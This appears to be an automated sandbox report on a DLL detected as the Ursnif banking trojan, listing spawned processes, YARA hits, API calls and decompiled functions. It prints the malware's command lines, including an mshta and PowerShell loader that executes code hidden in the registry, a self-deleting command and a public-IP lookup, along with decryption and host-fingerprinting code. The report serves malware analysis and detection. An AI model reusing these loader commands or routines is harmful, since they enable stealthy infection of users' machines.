                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                              Imagebase:0x1190000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:2
                              Start time:16:27:11
                              Start date:04/05/2022
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                              Imagebase:0x10e0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:17
                              Start time:16:27:58
                              Start date:04/05/2022
                              Path:C:\Windows\System32\mshta.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                              Imagebase:0x7ff63b5a0000
                              File size:14848 bytes
                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:18
                              Start time:16:28:00
                              Start date:04/05/2022
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                              Imagebase:0x7ff6ba650000
                              File size:447488 bytes
                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:19
                              Start time:16:28:01
                              Start date:04/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff647620000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:21
                              Start time:16:28:12
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                              Imagebase:0x7ff71b4c0000
                              File size:2739304 bytes
                              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:moderate

                              Target ID:22
                              Start time:16:28:14
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                              Imagebase:0x7ff66f440000
                              File size:47280 bytes
                              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              Target ID:24
                              Start time:16:28:17
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                              Imagebase:0x7ff71b4c0000
                              File size:2739304 bytes
                              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Target ID:25
                              Start time:16:28:18
                              Start date:04/05/2022
                              Path:C:\Windows\System32\control.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\control.exe -h
                              Imagebase:0x7ff62ce00000
                              File size:117760 bytes
                              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                              Target ID:26
                              Start time:16:28:19
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                              Imagebase:0x7ff66f440000
                              File size:47280 bytes
                              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:29
                              Start time:16:28:30
                              Start date:04/05/2022
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Explorer.EXE
                              Imagebase:0x7ff6f3b00000
                              File size:3933184 bytes
                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:33
                              Start time:16:28:47
                              Start date:04/05/2022
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                              Imagebase:0x7ff7bb450000
                              File size:273920 bytes
                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:34
                              Start time:16:28:48
                              Start date:04/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff647620000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:36
                              Start time:16:28:48
                              Start date:04/05/2022
                              Path:C:\Windows\System32\PING.EXE
                              Wow64 process (32bit):false
                              Commandline:ping localhost -n 5
                              Imagebase:0x7ff726940000
                              File size:21504 bytes
                              MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:37
                              Start time:16:28:56
                              Start date:04/05/2022
                              Path:C:\Windows\System32\RuntimeBroker.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                              Imagebase:0x7ff6b45b0000
                              File size:99272 bytes
                              MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Target ID:39
                              Start time:16:29:47
                              Start date:04/05/2022
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):
                              Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"
                              Imagebase:
                              File size:273920 bytes
                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language


                                Control-flow Graph (graph rendering and block-edge data omitted)
                                APIs
                                • RtlInitializeCriticalSection.NTDLL(0349A428), ref: 034800FA
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memset.NTDLL ref: 0348012B
                                • RtlInitializeCriticalSection.NTDLL(0616C2D0), ref: 0348013C
                                  • Part of subcall function 03485261: RtlInitializeCriticalSection.NTDLL(0349A400), ref: 03485285
                                  • Part of subcall function 03485261: RtlInitializeCriticalSection.NTDLL(0349A3E0), ref: 0348529B
                                  • Part of subcall function 03485261: GetVersion.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034852AC
                                  • Part of subcall function 03485261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034852E0
                                  • Part of subcall function 03488452: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 0348846C
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,03479100,?), ref: 03480165
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480176
                                • CloseHandle.KERNEL32(000005CC,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 0348018A
                                • GetUserNameA.ADVAPI32(00000000,?), ref: 034801D3
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034801E6
                                • GetUserNameA.ADVAPI32(00000000,?), ref: 034801FB
                                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0348022B
                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480240
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 0348024A
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480257
                                • GetShellWindow.USER32 ref: 03480272
                                • GetWindowThreadProcessId.USER32(00000000), ref: 03480279
                                • memcpy.NTDLL(0349A2F4,?,00000018,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034802B5
                                • CreateEventA.KERNEL32(0349A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,03479100,?), ref: 03480333
                                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0348035D
                                • OpenEventA.KERNEL32(00100000,00000000,0616B9C8,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480385
                                • CreateEventA.KERNEL32(0349A1E8,00000001,00000000,0616B9C8,?,?,?,?,?,?,?,03479100,?), ref: 0348039A
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034803A0
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480438
                                • SetEvent.KERNEL32(?,0348C384,00000000,00000000,?,?,?,?,?,?,?,03479100,?), ref: 034804CE
                                • RtlAllocateHeap.NTDLL(00000000,00000043,0348C384), ref: 034804E3
                                • wsprintfA.USER32 ref: 03480513
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                • String ID:
                                • API String ID: 3929413950-0
                                • Opcode ID: 6c01189554e135ea776792e160ff53fa80dd9c3ba1cabf5d71810be44198e6c7
                                • Instruction ID: ae11f052e228140bb2d6ef3f0d775e787ef2f42209261aab41e2a7de75cf1249
                                • Opcode Fuzzy Hash: 6c01189554e135ea776792e160ff53fa80dd9c3ba1cabf5d71810be44198e6c7
                                • Instruction Fuzzy Hash: D7C18DB0510348AFCB20FF65E88992F7BE8FB99700B19485FE546EF204C7759849CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 58%
                                			E03435FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				int _v8;
                                				long* _v12;
                                				int _v16;
                                				BYTE* _v20;
                                				long* _v24;
                                				void* _v39;
                                				char _v40;
                                				void _v56;
                                				int _v60;
                                				intOrPtr _v64;
                                				void _v67;
                                				char _v68;
                                				void* _t61;
                                				int _t68;
                                				signed int _t76;
                                				int _t79;
                                				int _t81;
                                				int _t85;
                                				long _t86;
                                				int _t90;
                                				signed int _t94;
                                				int _t101;
                                				BYTE* _t102;
                                				int _t103;
                                				void* _t104;
                                				void* _t105;
                                				void* _t106;
                                
                                				_t103 = __eax;
                                				_t94 = 6;
                                				_v68 = 0;
                                				memset( &_v67, 0, _t94 << 2);
                                				_t105 = _t104 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				_v40 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				asm("stosb");
                                				_t61 =  *0x343a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                				if(_t61 == 0) {
                                					_a8 = GetLastError();
                                				} else {
                                					_t101 = 0x10;
                                					memcpy( &_v56, _a8, _t101);
                                					_t106 = _t105 + 0xc;
                                					_v60 = _t101;
                                					_v67 = 2;
                                					_v64 = 0x660e;
                                					_v68 = 8;
                                					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                					if(_t68 == 0) {
                                						_a8 = GetLastError();
                                					} else {
                                						_push(0);
                                						_push( &_v40);
                                						_push(1);
                                						_push(_v12);
                                						if( *0x343a0e4() == 0) {
                                							_a8 = GetLastError();
                                						} else {
                                							_t18 = _t103 + 0xf; // 0x10
                                							_t76 = _t18 & 0xfffffff0;
                                							if(_a4 != 0 && _t76 == _t103) {
                                								_t76 = _t76 + _t101;
                                							}
                                							_t102 = E03436D63(_t76);
                                							_v20 = _t102;
                                							if(_t102 == 0) {
                                								_a8 = 8;
                                							} else {
                                								_v16 = 0;
                                								_a8 = 0;
                                								while(1) {
                                									_t79 = 0x10;
                                									_v8 = _t79;
                                									if(_t103 <= _t79) {
                                										_v8 = _t103;
                                									}
                                									memcpy(_t102, _a12, _v8);
                                									_t81 = _v8;
                                									_a12 = _a12 + _t81;
                                									_t103 = _t103 - _t81;
                                									_t106 = _t106 + 0xc;
                                									if(_a4 == 0) {
                                										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                									} else {
                                										_t85 =  *0x343a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                									}
                                									if(_t85 == 0) {
                                										break;
                                									}
                                									_t90 = _v8;
                                									_v16 = _v16 + _t90;
                                									_t102 =  &(_t102[_t90]);
                                									if(_t103 != 0) {
                                										continue;
                                									} else {
                                										L17:
                                										 *_a16 = _v20;
                                										 *_a20 = _v16;
                                									}
                                									goto L21;
                                								}
                                								_t86 = GetLastError();
                                								_a8 = _t86;
                                								if(_t86 != 0) {
                                									E03436C2C(_v20);
                                								} else {
                                									goto L17;
                                								}
                                							}
                                						}
                                						L21:
                                						CryptDestroyKey(_v12);
                                					}
                                					CryptReleaseContext(_v24, 0);
                                				}
                                				return _a8;
                                			}

                                APIs
                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,034324D8,00000001,034358D7,00000000), ref: 03435FF3
                                • memcpy.NTDLL(034324D8,034358D7,00000010,?,?,?,034324D8,00000001,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740), ref: 0343600C
                                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 03436035
                                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0343604D
                                • memcpy.NTDLL(00000000,75BCC740,055E95B0,00000010), ref: 0343609F
                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,055E95B0,00000020,?,?,00000010), ref: 034360C8
                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,055E95B0,?,?,00000010), ref: 034360DF
                                • GetLastError.KERNEL32(?,?,00000010), ref: 034360F7
                                • GetLastError.KERNEL32 ref: 03436129
                                • CryptDestroyKey.ADVAPI32(00000000), ref: 03436135
                                • GetLastError.KERNEL32 ref: 0343613D
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0343614A
                                • GetLastError.KERNEL32(?,?,?,034324D8,00000001,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 03436152
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                • String ID:
                                • API String ID: 1967744295-0
                                • Opcode ID: a0a0a23c970f744b18d47cd2598f43aade2fae79e7e80214cda4c6a550294f94
                                • Instruction ID: f550908860d73f15ea76c4a6a8f8f1bc7d7e1388d1d7c733fd114ff8d85bab6f
                                • Opcode Fuzzy Hash: a0a0a23c970f744b18d47cd2598f43aade2fae79e7e80214cda4c6a550294f94
                                • Instruction Fuzzy Hash: 65513B71900209FFDF10DFA4D884AEEBBB9EB09240F05842AF955EB240D7758A14DB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 96%
                                			E03433365(char __eax, void* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				void* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x343a310; // 0xd448b889
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E03432119( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x343a344 ^ 0x46d76429;
                                				} else {
                                					GetUserNameW(0,  &_v8); // executed
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x343a2d8, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t64 = _t62;
                                								 *_t69 =  *_t69 ^ E0343708D(_v8 + _v8, _t64);
                                							}
                                							HeapFree( *0x343a2d8, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x343a2d8, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t64 = _t68;
                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0343708D(_v8 + _v8, _t64);
                                						}
                                						HeapFree( *0x343a2d8, 0, _t68);
                                					}
                                				}
                                				asm("cpuid");
                                				_t67 =  &_v28;
                                				 *_t67 = 1;
                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                				 *(_t67 + 0xc) = _t64;
                                				_t39 = _v16 ^ _v20 ^ _v28;
                                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                				return _t39;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 0343339C
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034333B3
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 034333C0
                                • HeapFree.KERNEL32(00000000,00000000), ref: 034333E1
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 03433408
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0343341C
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 03433429
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03433447
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: 986e4268c31e67b6560b56410d220e9daa36d7aae7dd84856f9bfdfa73f43676
                                • Instruction ID: 98d96d930b0ad8ae171539771baaacb0b35cc9dd841b119248bd74f4468b112f
                                • Opcode Fuzzy Hash: 986e4268c31e67b6560b56410d220e9daa36d7aae7dd84856f9bfdfa73f43676
                                • Instruction Fuzzy Hash: F7319E76A00205EFDB10EFA9CC81BAEF7F9FF48200F64802AE454EB250DB70E9119B15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • StrRChrA.SHLWAPI(0616B5B0,00000000,0000005C,?,?,?), ref: 03479028
                                • _strupr.NTDLL ref: 0347903E
                                • lstrlen.KERNEL32(0616B5B0,?,?), ref: 03479046
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 034790C6
                                • RtlAddVectoredExceptionHandler.NTDLL(00000000,0349076B), ref: 034790ED
                                • GetLastError.KERNEL32(?,?,?,?), ref: 03479107
                                • RtlRemoveVectoredExceptionHandler.NTDLL(034B05B8), ref: 0347911D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                                • String ID:
                                • API String ID: 2251957091-0
                                • Opcode ID: 0a844530b5272e14b0daad89c8c7d88e3d2c8466fbb9707af78669bed365b4f3
                                • Instruction ID: a81616718dba77d569b3c5f72148caf1bacf28ac940d0937a42977fb21536170
                                • Opcode Fuzzy Hash: 0a844530b5272e14b0daad89c8c7d88e3d2c8466fbb9707af78669bed365b4f3
                                • Instruction Fuzzy Hash: DB312F729102506FEB11FFB9EC899EFBBE8E715250B19056BE511FF244D73148418B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0347C478
                                • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0347C48B
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0347C4A7
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0347C4C4
                                • memcpy.NTDLL(?,00000000,0000001C), ref: 0347C4D1
                                • NtClose.NTDLL(?), ref: 0347C4E3
                                • NtClose.NTDLL(?), ref: 0347C4ED
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 4be1cc93ac06094b97da2e9e161b80ba65ff97fd3d2baac1c00661e5ccbe209c
                                • Instruction ID: cd05d7880b419b00b5228db41363ee9b066ea0aed5fafaae0e4538ff4838f13f
                                • Opcode Fuzzy Hash: 4be1cc93ac06094b97da2e9e161b80ba65ff97fd3d2baac1c00661e5ccbe209c
                                • Instruction Fuzzy Hash: 7021D2B6900218BFDB01EFA5DC85AEEBFBDEF08B50F104066F905BA150D7719A459BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 38%
